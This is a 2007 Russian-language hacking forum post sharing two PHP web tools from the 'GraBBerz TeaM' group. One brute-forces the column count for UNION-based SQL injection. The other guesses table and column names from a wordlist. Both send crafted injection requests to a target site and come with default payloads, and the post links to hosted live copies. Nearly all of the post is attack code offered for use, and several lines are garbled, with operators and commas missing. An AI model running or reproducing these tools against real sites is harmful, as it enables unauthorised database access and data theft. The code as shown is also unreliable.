Тема: Полезные скрипты
Показать сообщение отдельно

  #37  
Старый 25.01.2007, 20:49
cRiLaZ
Новичок
Регистрация: 17.10.2006
Сообщений: 23
Провел на форуме:
144373

Репутация: 104
По умолчанию
Мой скрипт который подбирает количество колонок в скуле:

PHP код:
<?
######################################   if(is_good_boy($nick)){
######################################     echo <<<GreetZ 
########### GraBBerz TeaM ############     - лАмАрЕз
########## www.grabberz.com ##########     - @стериX
######## (c)оудед бай cRiLaZ #########     - Д'кей
######################################     - КоТ777
#### Брут колонок к СКЛ-инжектион ####     - РиДЖи
######### criSQLcolumnsPicler ########     - сиаттак
####         09.01.2007           ####     - Сато и другим...
######################################     GreetZ;
######################################   }
set_time_limit(0);
error_reporting(0);
?>
<html>
<head><title>criScB</title>
<style>
table, td {
    border : 1px dashed #444444;
    background-color : #000000;
    font : 12px courier new;
    color : #888888;
}
input {
    background-color: #000000;
    font:8pt verdana;
    text-align:center;
    color:#cccccc;
}
</style>
</head>

<body text=00ff00 bgcolor=000000>
<form method='post' action="<?echo $PHP_SELF;?>">
<br><br><br>
<table  border='0' cellspacing='0' cellpadding='2' align='center' width='360'>
<tr><td colspan='2' align='center' style="background-color: #cccccc; font-size: 18px; color: white; font-family: tahoma; padding-left: 5px; color:#000000;">
<b>SQL columns Picker</b></td></tr>
<tr><td align='center' colspan='2'>
by <font color='ff0000'>cRiLaZ</font> for <font color='ff0000'>GraBBerZ TeaM</font>
</td>
</tr>

<tr><td width='15%' align='center'><b>Запрос</b></td>
<td width='50%' align='right'><input name='man_zapros' type='text' value="<?if($_post['man_zapros']){echo $man_zapros;}else{echo 'http://crilaz.net.ru/ind.php?fuck=-1+union+select+|cols|/*';}?>" size=40%>
</td>
<tr>
<td rowspan=2 align=center>
<b>Текст</b>
</td>
<td align=right>
<input type='radio'checked name='text_tipe' value='error'>
<input type='text' size='36' value='Ошибки' name='error_text'>
</td>
</tr>
<tr>
<td align=right>
<input type='radio' name='text_tipe' value='good'>
<input type='text' size='36' value='Нужный' name='good_text'>
</td>
</tr>

<tr><td width='15%' align='center'><b>Колонки</b></td>
<td width='50%' align='right'><input name='columns' type='text' value="<?if($_post['columns']){echo $columns;}else{echo '50';}?>" size='40%'>
</td></tr>

<tr>
<td colspan='2' align='right'>
<input type='submit' value='                     Подобрать...                     ' name='gogogogo'>
</td>
</tr>
</table>
</form><br><br>
<?
if($_POST["gogogogo"]){
    $man_zapros       htmlspecialchars($_POST['man_zapros']);
    $arr_url             parse_url($_POST['man_zapros']); 
    $host             $arr_url['host'];
    $columns          $_POST['columns'];
    if((int)$columns>250){echo "<script>alert('Колонок не может быть больше 250!');</script>";}
    if($_POST['text_tipe']=="error"){
        $need_text=$error_text;} 
    else{
        $need_text=$good_text;}
    $col_num             "";
    $content          "";

    for($q=1;$q<=$columns;$q++){
        $bad_col_num.=$q.",";
        $good_col_num=substr($bad_col_num,0,(count($col_num)-2));
        
        $request=str_replace("|cols|",$good_col_num,$man_zapros);
        $zapros="GET $request HTTP/1.0\r\nHost: $host\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n";
        $soket=fsockopen("www.".$host80$errno$errstr10) or die ("$errstr ($errno)");
        fwrite($soket$zapros);
        while(!feof($soket)){
            $content.=fgets($soket);}
        //@$hell_words=eregi($need_text, $content);
        if(($_POST['text_tipe']=="error" && !eregi($need_text,$content) || ($_POST['text_tipe']=="good" && eregi($need_text,$content)))){
            echo "<br><font color='00ff00'>$request</font>";} 
        else{
            echo "<br><font color='ff0000'>$request</font>";}
        $content="";
        $request="";
    }
}
?>
А этот аналогично бодбирает названия таблиц или колонок, чего захотите вобщем

PHP код:
<?
######################################   гРит3ы: if(is_good_boy($nick)){
######################################     echo <<<freind 
########### GraBBerz TeaM ############     - лАмАрЕз
########## www.grabberz.com ##########     - @стериX
######## (c)оудед бай cRiLaZ #########     - Д'кей
######################################     - КоТ777
## Брут имен к колонкам и таблицам ###     - РиДЖи
########## criSQLtableBruter #########     - сиаттак
############# 14.01.2007 #############     - Сато и другим
######################################     freind;
######################################   }
set_time_limit(0);
error_reporting(0);
?>
<html>
<head><title>criStB</title>
<style>
table, td {
    border : 1px dashed #444444;
    background-color : #000000;
    font : 12px courier new;
    color : #888888;
}
input {
    background-color: #000000;
    font:8pt verdana;
    text-align:center;
    color:#cccccc;
}
</style>
</head>

<body text=00ff00 bgcolor=000000>
<form method='post' action="<?echo $PHP_SELF;?>">
<br><br><br>
<table  border='0' cellspacing='0' cellpadding='2' align='center' width='360'>
<tr><td colspan='2' align='center' style="background-color: #cccccc; font-size: 18px; color: white; font-family: tahoma; padding-left: 5px; color:#000000;">
<b>SQL tables Bruter</b></td></tr>
<tr><td align='center' colspan='2'>
by <font color='ff0000'>cRiLaZ</font> for <font color='ff0000'>GraBBerZ TeaM</font>
</td>
</tr>

<tr><td width='15%' align='center'><b>Запрос</b></td>
<td width='50%' align='right'><input name='man_zapros' type='text' value="http://crilaz.net.ru/ind.php?fuck=-1+union+select+1,2+from+|word|/*" size=40%>
</td>
<tr>
<td rowspan=2 align=center>
<b>Текст</b>
</td>
<td align=right>
<input type='radio'checked name='text_tipe' value='error'>
<input type='text' size='36' value='Ошибки' name='error_text'>
</td>
</tr>
<tr>
<td align=right>
<input type='radio' name='text_tipe' value='good'>
<input type='text' size='36' value='Нужный' name='good_text'>
</td>
</tr>

<tr><td width='15%' align='center'><b>Словарь</b></td>
<td width='50%' align='right'><input name='slovar' type='text' value='slovar.txt' size='40%'>
</td></tr>

<tr>
<td colspan='2' align='right'>
<input type='submit' value='                     Подобрать...                     ' name='gogogogo'>
</td>
</tr>
</table>
</form>
<?
if($_POST["gogogogo"]){
    $man_zapros htmlspecialchars($_POST['man_zapros']);
    $arr_url    parse_url($_POST['man_zapros']); 
    $host       $arr_url['host'];
    $brute_file $_POST['slovar'];
    if($_POST['text_tipe']=="error"){
        $need_text=$error_text;} 
    else{
        $need_text=$good_text;}
    $content    "";
    $brute_arr=file("$brute_file") or die ("Невозможно открыть файл со словарем!");
    foreach($brute_arr as $value){        
        $request=str_replace("|word|",$value,$man_zapros);
        $zapros="GET $request HTTP/1.0\r\nHost: $host\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n";
        $soket=fsockopen("www.".$host80$errno$errstr10) or die ("$errstr ($errno)");
        fwrite($soket$zapros);
        while(!feof($soket)){
            $content.=fgets($soket);}
        if(($_POST['text_tipe']=="error" && !eregi($need_text,$content) || ($_POST['text_tipe']=="good" && eregi($need_text,$content)))){
            echo "<br><font color='00ff00'>$request</font>";} 
        else{
            echo "<br><font color='ff0000'>$request</font>";}
        $content="";
        $request="";
    }
}
?>
(многие вещи не проверял, т.к. не люблю писать всякую чушь)
Пример работы можно посмотреть сдесь:
http://crilaz.grabberz.com/tools/SQL/criScP.php - колонки
http://crilaz.grabberz.com/tools/SQL/criStB.php - таблицы
Последний раз редактировалось cRiLaZ; 25.01.2007 в 21:35..
 
Ответить с цитированием